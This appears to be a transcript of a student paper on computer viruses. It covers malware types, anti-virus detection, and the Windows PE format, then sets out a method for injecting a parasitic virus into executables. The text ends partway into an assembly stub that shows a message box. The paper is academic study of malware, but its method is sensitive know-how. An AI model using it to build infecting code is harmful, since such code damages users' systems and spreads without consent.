code injection and computer viruses

66
Faculty of Applied Sciences and Engineering Department of Electronics and Informatics (ETRO) Code Injection and Computer Viruses Paper for the course of Operating Systems and Security by prof. Martin Timmerman. Beerend Ceulemans Janwillem Swalens 2012-2013

Upload: beerend-ceulemans

Post on 24-Oct-2015

186 views

Category:

Documents


2 download

DESCRIPTION

This is the paper that we wrote for our Operating Systems and Security course project.In this paper we will investigate what computer viruses are and how they function, and show how a parasitic virus could be written in the C/C++ programming language, using only a minimum of inline assembly code. We start by giving an overview of different types malware (focusing on viruses), and discuss techniques used by anti-virus software. Next, we explain how code injection works by taking a look at the Microsoft Portable Executable (PE) file format (which is used to store executable files in Microsoft Windows), and we investigate how code can be injected in such a file. We then implement a virus using this technique in C/C++, explain how it works and provide a demonstration on a real system.

TRANSCRIPT

Faculty of Applied Sciences and EngineeringDepartment of Electronics and Informatics (ETRO)

Code Injection and Computer Viruses

Paper for the course of Operating Systems and Security by prof. Martin Timmerman.

Beerend CeulemansJanwillem Swalens

2012-2013

Abstract

In this paper we will investigate what computer viruses are and how they func-tion, and show how a parasitic virus could be written in the C/C++ programminglanguage, using only a minimum of inline assembly code.

We start by giving an overview of different types malware (focusing on viruses),and discuss techniques used by anti-virus software. Next, we explain how code in-jection works by taking a look at the Microsoft Portable Executable (PE) file format(which is used to store executable files in Microsoft Windows), and we investigatehow code can be injected in such a file. We then implement a virus using thistechnique in C/C++, explain how it works and provide a demonstration on a realsystem.

ii

Contents

1 Malware overview 21.1 Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21.2 Viruses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

1.2.1 Companion virus . . . . . . . . . . . . . . . . . . . . . . 31.2.2 Overwriting virus . . . . . . . . . . . . . . . . . . . . . . 41.2.3 Parasitic virus . . . . . . . . . . . . . . . . . . . . . . . . 41.2.4 Memory resident virus . . . . . . . . . . . . . . . . . . . 41.2.5 Boot sector virus . . . . . . . . . . . . . . . . . . . . . . 41.2.6 Device driver virus . . . . . . . . . . . . . . . . . . . . . 51.2.7 Source code virus . . . . . . . . . . . . . . . . . . . . . . 51.2.8 Document virus / Macro virus . . . . . . . . . . . . . . . 5

1.3 Worms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51.4 Backdoors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61.5 Trojan horses . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61.6 Adware & Spyware . . . . . . . . . . . . . . . . . . . . . . . . . 6

2 Anti-virus techniques 72.1 Approaches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72.2 Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7

2.2.1 Signatures . . . . . . . . . . . . . . . . . . . . . . . . . . 82.2.2 Heuristics . . . . . . . . . . . . . . . . . . . . . . . . . . 82.2.3 File emulation . . . . . . . . . . . . . . . . . . . . . . . 92.2.4 Behavior blocking . . . . . . . . . . . . . . . . . . . . . 92.2.5 Inoculation . . . . . . . . . . . . . . . . . . . . . . . . . 10

2.3 Other concerns . . . . . . . . . . . . . . . . . . . . . . . . . . . 102.3.1 Performance . . . . . . . . . . . . . . . . . . . . . . . . 102.3.2 False positives . . . . . . . . . . . . . . . . . . . . . . . 11

2.4 Disinfection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11

iii

iv CONTENTS

3 Portable Executable file format 133.1 Address formats . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

3.1.1 Relative Virtual Address (RVA) . . . . . . . . . . . . . . 133.1.2 Virtual Address (VA) . . . . . . . . . . . . . . . . . . . . 143.1.3 File offset . . . . . . . . . . . . . . . . . . . . . . . . . . 14

3.2 PE header structures . . . . . . . . . . . . . . . . . . . . . . . . 143.2.1 IMAGE DOS HEADER . . . . . . . . . . . . . . . . . . 153.2.2 IMAGE NT HEADERS . . . . . . . . . . . . . . . . . . 153.2.3 IMAGE SECTION HEADER . . . . . . . . . . . . . . . 15

3.3 Import Section . . . . . . . . . . . . . . . . . . . . . . . . . . . 16

4 Code injection 174.1 Location of injection . . . . . . . . . . . . . . . . . . . . . . . . 174.2 EntryPoint . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204.3 Programming issues . . . . . . . . . . . . . . . . . . . . . . . . . 20

5 Implementation 215.1 First experiments . . . . . . . . . . . . . . . . . . . . . . . . . . 215.2 Compiler settings . . . . . . . . . . . . . . . . . . . . . . . . . . 225.3 Viral code structure . . . . . . . . . . . . . . . . . . . . . . . . . 235.4 First generation . . . . . . . . . . . . . . . . . . . . . . . . . . . 23

5.4.1 setLLAndGPA . . . . . . . . . . . . . . . . . . . . . . . 275.4.2 AStubStart . . . . . . . . . . . . . . . . . . . . . . . . . 285.4.3 CStubStart . . . . . . . . . . . . . . . . . . . . . . . . . 295.4.4 ThreadStart . . . . . . . . . . . . . . . . . . . . . . . . . 29

5.5 Next generations . . . . . . . . . . . . . . . . . . . . . . . . . . 305.6 Disinfection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305.7 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31

6 Tests and Results 326.1 Viral replication . . . . . . . . . . . . . . . . . . . . . . . . . . . 326.2 Infection capability . . . . . . . . . . . . . . . . . . . . . . . . . 356.3 Anti-virus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35

7 Conclusion 37

A Infection code 38

B Disinfection code 57

Introduction

In this paper, we will investigate what computer viruses are and how they func-tion, and show how a parasitic virus could be written in the C/C++ programminglanguage. Most parasitic viruses are written in assembly because of their low levelnature of operation. We will show that it is also possible to write one in C/C++.

The first two chapters cover the theoretical part of our work. Because manypeople seem to think that every malware program is a virus, we give an overviewof all different kinds of malware in chapter 1. We also show that within the class ofviruses, even more subdivisions can be made. Chapter 2 delves into the techniquescommonly used by anti-virus software to detect these threats.

In the next two chapters, we take a more practical look at code injection. Inchapter 3, we examine the Microsoft Portable Executable (PE) file format, theformat used to store executable files in Microsoft Windows. We need an extensiveknowledge of this format to be able to infect these types of files. Chapter 4 explainshow the actual code injection, i.e. the injection of our parasitic virus into a hostexecutable, will work, and what issues need to be resolved before we can do this.

Then, in chapter 5, we show our implementation of a virus. We go through ourC++ code, and explain its different aspects. Finally, in chapter 6, we demonstratean infection of the virus, and its propagation to other files, on an actual system. Wealso take a look at the detection rates by some virus scanners.

1

Chapter 1

Malware overview

1.1 Malware

[15] defines malware as a set of instructions that run on your computer and makeyour system do something that an attacker wants it to do. They also give a list ofpossible things such ‘a set of instructions’ could do:

• Delete sensitive configuration files from your hard drive, rendering yourcomputer completely inoperable.

• Infect your computer and use it as a jumping-off point to spread to all of yourfriends’ computers.

• Monitor your keystrokes and let an attacker see everything you type.

• Gather information about you, your computing habits, the Web sites youvisit, the time you stay connected, and so on.

• Send streaming video of your computer screen to an attacker, who can es-sentially remotely look over your shoulder as you use your computer.

• Grab video from an attached camera or audio from your microphone andsend it out to an attacker across the network, turning you into the unwittingstar of your own broadcast TV or radio show.

• Execute an attacker’s commands on your system, just as if you had run thecommands yourself.

• Steal files from your machine, especially sensitive ones containing personal,financial, or other sensitive information.

2

1.2. VIRUSES 3

• Upload files onto your system, such as additional malicious code, stolen data,pirated software, or pornography.

• Bounce off your system as a jumping-off point to attack another machine,laundering the attacker’s true source location to throw off law enforcement.

• Frame you for a crime, making all evidence of a caper committed by anattacker appear to point to you and your computer.

• Conceal an attacker’s activities on your system, masking the attacker’s pres-ence by hiding files, processes, and network usage.

The term malware is quite general and it covers many different types of programs.In the following sections we will list some of these types, focusing on viruses.

Note that there are many nasty programs out there and they might combinesome techniques or characteristics of different malware types so there might notalways be a single correct category to put them in.

1.2 Viruses

Mark Ludwig describes a computer virus as a program that reproduces[9]. Onceexecuted, it makes copies of itself and those copies will also have this capability.

He also notes that the term computer virus might be considered a misnomer,because it carries a negative connotation while a computer virus does not need tobe inherently malicious. The benign or malicious nature of a virus comes fromthe payload but not from the viral reproduction mechanism. There are examplesof benevolent viruses. For example, the compressing viruses can compress largeexecutables and actually save disk space[16].

1.2.1 Companion virus

A companion virus does not really infect a program, but it makes sure it gets ex-ecuted before the actual program. In the MS-DOS days, this could be done byhaving the virus as a .COM program with the same name as an existing .EXEprogram. If the user would just type the name of the program (without the fileextension), the OS would first look for a .COM file, executing the virus instead ofthe intended program. This technique became obsolete when users started runningtheir programs from the GUI instead of the console but the same effect could stillbe achieved by simply changing the target of a shortcut on the Windows desktopor start menu. When the virus is executed, it may also trigger the program that theuser initially wanted to execute, hiding its presence for the user.

4 CHAPTER 1. MALWARE OVERVIEW

1.2.2 Overwriting virus

This type of virus will simply replace a target executable with itself by overwritingit (partially or completely). From the attacker’s point of view, this kind of virus istoo easy to detect. It will damage the host file and the user will probably noticethis.

1.2.3 Parasitic virus

To overcome the main problem of the overwriting viruses (easy detection becausethe host gets damaged), parasitic viruses have been developed. A parasitic viruswill infect a host by injecting its own code into the host. Simply injecting its codeisn’t enough: it should also make sure the code gets executed. This is the typeof virus that we will implement, so we will elaborate on this particular infectionmechanism in Chapter 4.

1.2.4 Memory resident virus

In the case of a parasitic virus, when an infected program is executed, the virusmay run, it passes control to the host program and exits. Also, the previous classesof viruses need some kind of search routine to scan the file system for possiblehosts to infect. This behaviour will also result in increased disk activity that couldslow down the system [9, 17].

Memory resident viruses are viruses that remain in memory (RAM) constantly.Instead of actively searching for new hosts, they hook themselves to interrupts(system calls). This way, they can actually monitor what the user is doing andinfect a program when it gets executed. The capturing of system calls also givesgreat potential for spying on data [17].

Note that this is a concept from the DOS-era[11]. Nowadays, operating sys-tems support multi-threading. A virus could set up a thread for its own code andpass control to the host.

1.2.5 Boot sector virus

When a computer is booted, it doesn’t know which OS has to be loaded or wherethis OS would be located on the hard drive. It will first run the BIOS program, butthis program also has no knowledge about the present OS. It will in turn look at themaster boot record (MBR) at the start of the boot disk. (This boot disk is often theharddrive of the PC but this can also be a CD/DVD or a USB device, depending onthe BIOS configuration.) This MBR will contain some machine code which is ableto locate and launch an OS. This structure is not limited to the booting of operating

1.3. WORMS 5

systems. A boot sector can contain code that launches any program that is presenton the disk.

A virus could infect the boot sector by overwriting the MBR with its own code.This kind of virus of called a boot sector virus. The virus will be executed eachtime the OS boots. (Note that they can operate before any anti-virus is started.)When the virus is ready, it should run the original MBR program so the OS can beloaded. Usually, these viruses become memory-resident after booting[17].

1.2.6 Device driver virus

Viruses can only function when executed and this might require some user interac-tion. It would be nice if the OS would always load the virus in memory. This canbe done by infecting a device driver. These drivers are just programs, stored some-where on the disk and will be loaded (in kernel mode) each time the OS boots[17].

1.2.7 Source code virus

Some viruses don’t infect executables but search the system for uncompiled pro-grams. They can for example look for C files, add their own code by including aheader and adding a function call to the viral code in the main function of the pro-gram. This seems pretty silly, but a less conspicuous infection of the source codeof a large project could be pretty effective. An advantage of this kind of viruses isthat they can be platform independent. Their disadvantage is the relatively smallnumber of possible targets[15].

1.2.8 Document virus / Macro virus

Some applications (e.g. Microsoft Word and Excel) allow users to write macros.Taking Excel as an example: it is possible to write macros in Visual Basic, whichis an entire programming language, giving lots of possibilities. A virus could writeits code in the Open Document() function of an Excel document, this code willbe executed each time the user opens this document. However, under the defaultsettings, Excel will give a warning that the document contains macros and it willask the user if they should be executed[17].

1.3 Worms

Worms, like viruses, are self-replicating. The big difference is that a virus usuallyrequires some user interaction (execution of some program) while worms operateautonomously. Worms often exploit bugs (e.g. buffer overflow) to automatically

6 CHAPTER 1. MALWARE OVERVIEW

transfer themselves over a network. Because of this ‘living’ nature, they can spreadextremely fast.

1.4 Backdoors

Once an attacker has gained control over a system, he might want to ‘open a back-door’ so he has less trouble when he wants to enter this system again at a latertime[15]. He could achieve this by configuring something like a remote shell oreven a remote desktop with a full GUI to always run after booting the computer.Note that these could be programs with legitimate uses. With such a program run-ning on the target computer, the attacker can simply connect to it and he will havecontrol over the target.

1.5 Trojan horses

Getting people to install your malware is not that easy anymore[17]. Users maystill be naive enough to run executables you send them, but nowadays they willmost likely get some notification from their e-mail client or anti-virus softwarethat they should not trust your e-mail. Some types of malware try to make userswant to install the software on their computer: a Trojan horse (or simply trojan) isa program that appears to be useful and benign, but secretly has some maliciousfunctionality as well[15]. They are named after the story in Greek Mythologywhere the Greeks invaded the city of Troy by hiding soldiers in a giant woodenhorse, which they presented as a gift. The Trojans took the horse inside their cityand at night the Greek soldiers came out and were able to open the gates for theirarmy.

1.6 Adware & Spyware

Spyware is a name for software that spies on the target system. It could gather(sensitive) information (e.g. stored passwords, e-mails, pictures, etc.) or capturekeystrokes (this is called a keylogger). This gathered information can then be sendto the attacker over the internet. Adware is a kind of spyware that doesn’t reallylook for sensitive information, but for the interests of the user by e.g. lookingat his or her browsing behavior. This information could be used to generate per-sonalized advertisements. Adware is not really malicious in nature but it is ofteninstalled without the user’s knowledge or permission and can be considered a pri-vacy violation[16].

Chapter 2

Anti-virus techniques

In this chapter, we will take a closer look at the techniques used by anti-virussoftware to detect malware. Although the exact details and ‘secret sauce’ used bypopular commercial anti-virus software remain well-kept secrets – both from viruswriters and competitors, some general techniques are still known.

2.1 Approaches

There are two main approaches used to detect malware[6].

• An activity monitor will continuously monitor the running system for suspi-cious activity. For example, a program opening another EXE for write accessmight be suspicious.

• A malware scanner scans the file system, RAM, boot sector etc. and checksits integrity, i.e. it will try to detect whether any files have been infected bya virus.

In most cases, anti-virus software will have to use both approaches. However,in some scenarios, only one approach is necessary, e.g. a mail server can scan theincoming mail for malware, but might not need an activity monitor.

2.2 Techniques

There exist a plethora of techniques used by anti-virus software[16]. This is nec-essary because some viruses might be impossible to detect using one technique.It has even been proven that there exists no algorithm that can detect all possibleviruses with no false positives[4].

7

8 CHAPTER 2. ANTI-VIRUS TECHNIQUES

2.2.1 Signatures

The simplest and still most common technique is signature based detection. Thistechnique consists of comparing the contents of a file to a given dictionary of ‘virussignatures’. These virus signatures are patterns which identify a virus.

The earliest form of signature based detection was a simple string scan. Thesignature is a sequence of bytes that appears in a virus, but is not likely to be foundin a legitimate program. If a file contains this string, it is infected.

A simple improvement on this algorithm is to use wildcards in the pattern, sosmall variations of a virus can also be detected. Some algorithms also allow a smallnumber of mismatches, or they use regular expressions for more complicated virusdetection.

This technique is widely used, and can be very effective. However, it can onlybe used for known viruses, of which samples have been obtained and a signaturewas created. As new viruses get created every day, anti-virus software must includea way to update the virus signature dictionary. Thus, this technique can be veryeffective in preventing the spread of a known virus, but won’t protect the user fromnew viruses.

Virus writers have also tried to circumvent it by using polymorphic and meta-morphic code. These sorts of viruses change their code when spreading, whilekeeping the original algorithm intact.

2.2.2 Heuristics

Another, more sophisticated technique is based on heuristics, which can be used toidentify both known and new malware.

The anti-virus will check for some common features of viruses:

• In most EXE files, the tail of the last section (the last few kilobytes) willcontain a lot of zeros. Viruses, including ours, often overwrite this with theircode.

• Changes to the section headers are very suspicious. Atypical values, such asthe “data” section being marked executable, or extra sections with unknownnames, are telltale signs of a virus.

• Other inconsistencies in the header, such as an incorrect section or file size,are another red flag.

• Suspicious jumps in the code are another sign of a virus. Viruses oftenchange the entry point of an EXE to point to the start of the virus, afterwhich it jumps back to the original code. In some cases, this is detectable.

2.2. TECHNIQUES 9

• Suspicious imports: a virus might patch the imports in an EXE file to includeextra libraries, which might also be detectable.

The anti-virus maker will train a neural network using a set of known positivesand known negatives, which when given these features as input can detect whethera file is infected or not.

2.2.3 File emulation

File emulation or sandboxing is a more recent technique, aimed to deal with thefact that users continually run new programs from untrusted sources.

When running an unverified program, it will run in a virtual system first, inwhich it has access to the same information as in the real system. It can makemodifications to files and the registry, however these are made on a copy of theactual information. The anti-virus software monitors the program, and detects sus-picious behavior. If the program does nothing suspicious, the modifications madeby the program can be saved permanently, else they are thrown away.

This technique might be used in combination with heuristics, i.e. a programwhich is suspected to be infected according to the heuristics, can be run in thesandbox to confirm or deny this hypothesis.

This technique has some disadvantages. First of all, the virtual subsystemmight have reduced functionality compared to the real system, which can causecompatibility problems for the program under test. Secondly, sandboxing mightnot detect all viruses, which will allow them to run in the real system, where theymight disable the sandbox. Lastly, the sandbox might have ‘holes’, which allowthe program to ‘escape’ from it, i.e. execute code on the real machine instead ofthe virtual machine.

2.2.4 Behavior blocking

Behavior blocking is a system which attempts to block virus infections by disal-lowing some behaviors. For example, the opening of one executable by anotherfor writing could be blocked. However, instead of outright blocking this behavior,which might have legitimate uses, the anti-virus will display a message to the userasking for his permission.

Unfortunately, such messages quickly become unwieldy for the user. There aretoo many of them, and the user often doesn’t understand them, which will lead himto just accept them all.

An even larger drawback is that implementing this technique is very difficultwithout good support from the operating system and even the hardware.

10 CHAPTER 2. ANTI-VIRUS TECHNIQUES

However, when combined with heuristics, this technique does offer some promis-ing uses. The heuristics can be used to reduce the number of false positives, forexample in viruses embedded in e-mails (the self-mailing behavior can be recog-nized and blocked).

2.2.5 Inoculation

Lastly, a now long outdated technique is inoculation, building on an idea similarto vaccination. A virus that infects a file will ‘mark’ it to prevent double infection.It might change the seconds in the timestamp to 58, or it might write a short stringto a specific location in the EXE header. The anti-virus software will add thesemarkers to non-infected files, so the virus will think they are already infected.

This technique was quite popular at the time viruses first appeared. However, ithas large drawbacks, e.g. when viruses write contradictory markers (one changesthe seconds in the timestamp to 58, the other to 59) it is impossible to inoculateagainst both. It is also impossible to inoculate against unknown viruses. Lastly,inoculation can make the detection of viruses harder, because the marker might beused by the detection algorithm (i.e. we have to differentiate between an infectedfile and an inoculated file).

2.3 Other concerns

2.3.1 Performance

In the early days of anti-virus software, the amount of signatures used by an anti-virus ranged in the hunderds. Nowadays, there are over 60.000 known viruses andother malware. If a virus scanner would compare every file on the user’s systemagainst each of those signatures, it would be unacceptably slow[6].

Anti-virus software uses some techniques to alleviate this problem. First ofall, signatures are put into categories designating which sort of file they infect (e.g.boot sector, COM files, EXE files). This way, an EXE file only has to be checkedagainst viruses that infect EXE files.

Secondly, certain rules can be applied to avoid looking through the whole file.For example, Word DOC files contain macros in a very specific location, so onlythis part of the file has to be checked. Similarly, COM files are mostly infected atthe end of the file.

Lastly, instead of using specific signatures to identify a single virus variant, itmight be more efficient to generate a more general signature that can identify anumber of viruses. These signatures can contain wildcards, regular expressions,

2.4. DISINFECTION 11

etc. to identify many variants of the same type of virus. There exist “virus gen-erators” on the internet, against which these types of signatures can be especiallyefficient.

2.3.2 False positives

A “false positive” happens when anti-virus software identifies a non-malicious fileas a virus. This can have serious consequences when the anti-virus tries to ‘disin-fect’ the file. For instance, if the anti-virus software is configured to immediatelydelete or quarantine an infected file, a false positive in an essential file can renderthe operating system unusable.

There have been several incidents in which popular anti-virus software left theuser’s system unusable. For example, in May 2007, a faulty virus signature is-sued by Symantec mistook “netapi32.dll” and “lsasrv.dll”, two essential Windowssystem files, for a Trojan horse[5]. It quarantined them, rendering the system un-usable.

False positives can not only have grave consequences for the user, but alsofor the anti-virus maker. After a faulty signature update issued in April 2010 byMcAfee, rendering many systems worldwide unusable, they offered a financialcompensation to their customers[19]. Similarly, when in October 2011 the Mi-crosoft Security Essentials suite flagged the Google Chrome web browser (rivalto Microsoft’s own Internet Explorer) as a virus and blocked or removed it fromuser’s computers, this lead to a great deal of reputation damage for Microsoft[8].

2.4 Disinfection

After a virus has been detected, it is of course necessary to remove it from thesystem.

The most easy removal method is to quarantine or remove the infected file fromthe system. In the case of removal, the infected file is just deleted from the system.When quarantining a file, it is first put in a ‘quarantine’, where the user can inspectthe file but it cannot cause any further harm to the system, after which the user candecide to remove it or not.

Removing is, in fact, the most reliable method of disinfection. Afterwards, theuser is supposed to recover the removed file from a back-up, or re-install it (thismight mean re-installing the complete operating system). This guarantees that thevirus is removed from the system, and the infected file is now replaced with a cleanversion. However, it requires effort from the part of the user, and some forethought(making back-ups).

12 CHAPTER 2. ANTI-VIRUS TECHNIQUES

Another method, which requires less effort and technical expertise from theuser, is to disinfect the file, i.e. try to remove the virus from the file.

Originally, anti-virus software was only able to disinfect known viruses, forwhich the anti-virus makers wrote a specific removal tool. However, since the riseof virus generators, it has been necessary to write generic disinfection tools. It ispossible to write such tools, but it remains a difficult problem: this method worksbut cannot be considered truly reliable.

One way to disinfect files, also used in the removal tool we wrote for our virus,is to find the virus code among the original code of the host program. Somewherein this code, we find the entry point of the original host (where the virus ‘jumpsback’ to the host program). The removal tool removes the virus code, and replacesthe entry point in the PE header to point to the original entry point instead of theentry point of the virus.

Unfortunately, it is in many cases still impossible to use such generic methods,and in some cases it is even impossible to clean a program (e.g. when the virus hasoverwritten a part of the original program). It is estimated that around 30% of allviruses cannot be removed, although many anti-virus programs do not even comeclose to this figure[16].

Chapter 3

Portable Executable file format

The virus that we will write in this paper will inject itself into EXE files on Win-dows. Before we can do this, it is important to know how the code and data in thesefiles are structured.

EXE files on Windows use the Portable Executable (PE) file format. This for-mat, also used for DLLs, object code and others, is a data structure that containsall necessary information for Windows to load the executable code contained in it.

The information presented in this chapter comes from the official specifica-tion for the Microsoft Portable Executable (PE) and Common Object File Format(COFF)[10] and some articles from the MSDN website[12, 13, 14]. [12] (1994)is older than the two others (2002), but the newer ones don’t show any example Ccode, while the 1994 article does.

There is much to say about all these things, but in this chapter only the partsrelevant to code injection are selected.

3.1 Address formats

When working with PE files and assembly code, it is important to know the differ-ent kinds of addresses that are being used.

3.1.1 Relative Virtual Address (RVA)

The RVA is the address of an item after it is loaded into memory, with the baseaddress of the image subtracted. (Thus, relative to the ImageBase.)

13

14 CHAPTER 3. PORTABLE EXECUTABLE FILE FORMAT

3.1.2 Virtual Address (VA)

This is the same as the RVA, except that the base address of the image file is notsubtracted. The address is called “virtual” because the OS does not guarantee thatthe image file will be loaded at its preferred location. Because of this, the VA isless predictable than the RVA.

3.1.3 File offset

The file offset is simply the position in the file, written on disk. It is not really anaddress per se, but it has similar properties because it also points to some location.As we will see in the next sections, a PE file contains sections which will reside ata certain location in the file but are also given a RVA for when they are loaded inmemory. Sometimes, a conversion between a file offset (in a section) and a RVA isneeded.

3.2 PE header structures

Figure 3.1: Typical Portable EXE File Layout[10]

In Figure 3.1, the general layout of a PE file is shown. The file consists ofheaders and sections. Most sections contain either byte code (or machine code)or data. (There are some sections which contain some special information, but we

3.2. PE HEADER STRUCTURES 15

won’t go into detail about those.) The headers provide information on how thesections (and thus, the program) should be loaded into memory. In Windows.h,functions and data structures are provided to easily work with these files. Thisfile format is used for EXE files but also for DLLs and others. This chapter onlyconsiders executables, but the others could be manipulated in a similar way.

3.2.1 IMAGE DOS HEADER

The first header is the MS-DOS compatible header, called IMAGE DOS HEADER.When the file is executed in MS-DOS, the OS will be able to read this header andexecute the MS-DOS stub program. By default this program simply prints a mes-sage saying “This program cannot be run in DOS mode”. A compatible OperatingSystem will skip this entire header and just look at the value located at file offset0x3C which contains a pointer to the PE header or IMAGE NT HEADERS. It willthen turn to this PE header for instructions on how to load the actual program.

3.2.2 IMAGE NT HEADERS

The IMAGE NT HEADERS consist of IMAGE NT SIGNATURE,IMAGE FILE HEADER and IMAGE OPTIONAL HEADER. The signature con-tains the characters “PE\0\0” and can be used to check if the file is a valid EXE.The file header contains some basic information about the file (e.g. NumberOfSec-tions) but most importantly it contains a field saying how big the optional header,which directly follows the file header, will be. The optional header contains manyfields but from the perspective of code injection the most important fields are thefollowing:

• AddressOfEntryPoint: the RVA of the first byte of code that will be executed.In Chapter 4, we will modify this address to execute our own code.

• ImageBase: the preferred load address of the file in memory. It will be usedto convert between different address modes.

3.2.3 IMAGE SECTION HEADER

Immediately following the IMAGE OPTIONAL HEADERS are theIMAGE SECTION HEADERs. They have a fixed size and their number was givenin the NumberOfSections field of IMAGE NT HEADERS.FileHeader. They con-tain the following important fields:

• Misc.VirtualSize: the actual size that is being used by the section. Sectionsmight be zero-padded at the end to ensure a certain alignment.

16 CHAPTER 3. PORTABLE EXECUTABLE FILE FORMAT

• VirtualAddress: in executables, this field contains the RVA where the sec-tion begins in memory. It will be used to convert between different addressmodes.

• SizeOfRawData: the total size of the section (used + unused).

• PointerToRawData: the file offset to the raw data of the section.

• Characteristics: a bitmap of flags that indicate some attributes of the section,e.g. if the section contains code, if it is writable, etc.

3.3 Import Section

A PE file will always import some functionality from some DLLs. In Windows,all programs have some dependency on kernel32.dll and many use functions fromuser32.dll. These dependencies are described in the import section.

The import section is simply an array of IMAGE IMPORT DESCRIPTORstructures. For each imported executable (like kernel32.dll or user32.dll) therewill be such a structure in the import section. The most important fields of a IM-AGE IMPORT DESCRIPTOR are the name field, which is a RVA that points toan ASCII string that contains the name of the imported executable, and 2 identicalarrays called the Import Address Table (IAT) and Import Name Table (INT). Boththese arrays contain elements of the IMAGE THUNK DATA type, one for eachimported variable or function. The reason why there are 2 arrays is that before anycode is executed, the IAT will be overwritten by the Windows loader and the INTis there to still have the original information as well. Basically, the loader will loada DLL and look for the requested functions. For each of those functions it willreturn its address and write it on the corresponding slot in the IAT.

Chapter 4

Code injection

Now that we know how a Portable Executable is structured, we will examine how a(malicious) program could inject code of its own into a target host application. Thischapter will explain how we can do this, and try to answer some issues surroundingcode injection; in the next chapter we will show our actual implementation in C.

There are different tools that are able to show the contents of a PE in a struc-tured way. Such tools are very useful when you are working on code injectionor when you are reverse engineering a program. Examples of free tools are PE-view and CFF Explorer. Figures 4.1a and 4.1b show a screenshot of PEview andCFF Explorer respectively, both looking at the AddressOfEntryPoint in the op-tional header. CFF Explorer has much more features than PEview, but we like thelatter better because it displays the bytes in the sections nicer and allows an easyswitching between different address/offset modes.

It is quite obvious that the injected code will need to be compiled machinecode. There remain three main issues to successfully inject code into a PE:

• Where to put the code?

• How to make sure the code is executed?

• How to make sure the injected code works inside the host?

These issues are addressed in the next sections.

4.1 Location of injection

It doesn’t really matter where the injected code will end up. However, if the hostprogram should still be able to function normally after injection, none of its originalcode should be overwritten. Figure 4.2a shows a part of a code section in a PE. The

17

18 CHAPTER 4. CODE INJECTION

(a) PEview

(b) CFF Explorer

Figure 4.1: Screenshots of (a) PEview and (b) CFF Explorer

end of a section is often padded with zeros that are not being used. This is an ideallocation to put code of our own. After injecting some code, the section looks likeFigure 4.2b. Such a region containing only zeros is called a code cave. It mightalso be possible to find code caves somewhere in the middle of a section, but theyare less likely to be large enough to hold our code.

Even at the end of a section there is no guarantee that there exists a code cavethat is large enough to contain our code. This problem could be solved simplyby expanding a section making it large enough, or adding an extra section justfor our code[3]. From implementation perspective both solutions introduce somedifficulties. In the second solution, a new section header will need to be created. To

4.1. LOCATION OF INJECTION 19

(a) empty code cave

(b) code cave with injected code

Figure 4.2: Example of a code cave

do this, all information after the last original header will need to be moved to makeroom for the new header. Also, all pointers to raw data in the original headers willneed to be updated. This is not that difficult, but it involves some extra work. Thesame problem arises when increasing the size of a section. Unless the expandedsection is the last one. In this case, only the size fields in the corresponding headerneed to be updated.

In our own implementation, we chose to expand the last section. When doingthis, we have to make sure that the new size of the section is a multiple of theFileAlignment that is defined in the optional header. If we neglect to do this, theWindows loader will say that the injected host is not a valid Win32 application andit will not run it.

Note that expanding the last section of a PE, and marking it executable, makesour virus easier to detect (using heuristics), in comparison to using a code cave inthe middle of a section. However, since evading anti-virus software is not our aimin this academic example, we choose the former method anyway.

20 CHAPTER 4. CODE INJECTION

4.2 EntryPoint

To make sure our code will get executed, there are again several possibilities. Onepossibility is to analyze the original code and to modify it in such a way that itwill jump to our code at some point. Much easier but of course less stealthy isto simply change the AddressOfEntryPoint in the optional header to point to theinjected code. This way the PE will execute our code as very first. If we save theoriginal AddressOfEntryPoint somewhere, we can write our own code in such away that when it is finished, it jumps to the original host program code.

4.3 Programming issues

Because of the low-level nature of what we are trying to accomplish, it is straight-forward to work in assembly. It is however much easier to write a program in a highlevel programming language like C or C++. After all, the compiler will translatethis code into machine code anyway so the end result is the same.

Even when writing the injected code in assembly, there is a problem whenusing calls to functions: a function call takes an address to the called function, butwe do not know what that address will be in the host program at the time whenwe are writing our code. This problem will be solved by using placeholders whenwriting the code. We can for example write 0xCCCCCCCC each time we refer toan address we do not know yet. When the host PE file is opened, we should resolveall missing addresses and make sure that they are correctly filled in before injectingthe code.

In C++, the same problem exists but because it is a high level language it isnot that obvious to work around it. In assembly, a function is called by callfunctionaddress but in C++ we usually write something like function().So how do we make sure the address of this function is corrected before injection?There is also a problem when using strings. When we want our injected code toshow a message box for example, we would write something like MessageBox("ourmessage"). The compiler however doesn’t put the code and the used string “ourmessage” at the same place in memory: the string is put in the data section, andthe MessageBox code in the code section uses the address of that string. Like thefunction addresses, this address won’t be the same in the host application.

Besides these addressing difficulties, there is also the issue that the compiledcode will most likely not work in the host application if the default compiler set-tings are used. These pitfalls and working solutions will be examined in detail inChapter 5 where we will go over the most important aspects of our source code.

Chapter 5

Implementation

It is quite difficult to find decent information on the implementation of a virus.Many people claim to have written a “virus” but they only wrote some programor Visual Basic script that adds a key to the Windows registry so the “virus” getsexecuted on each boot of the OS and does some annoying things. We found onebook[9] that provides source code but it uses assembly. It is also outdated since itcan’t handle the PE format and only targets DOS programs.

When looking for “PE injection” we found again many assembly examples,but one of those injects the assembly code with a C++ program[1]. Our own im-plementation is built on the code presented there.

5.1 First experiments

In our first experiments, we simply started from the exact tutorial as presented in[1] to test if it actually works. We found out it does: it shows a message box beforethe host program can start.

#define bb(x) __asm _emit x

__declspec(naked) void StubStart(){__asm{

5 pushad // Preserve all registers

// Delta offset trick to get correct ebpcall GetBasePointer

GetBasePointer:10 pop ebp

sub ebp, offset GetBasePointer

// Create message box: MessageBox(NULL, szText, szTitle, MB_OK)// Push arguments to MessageBox (in reverse order)

15 push MB_OK

21

22 CHAPTER 5. IMPLEMENTATION

lea eax, [ebp+szTitle]push eaxlea eax, [ebp+szText]push eax

20 push 0// Call MessageBox (its address is a placeholder)mov eax, 0xCCCCCCCCcall eax

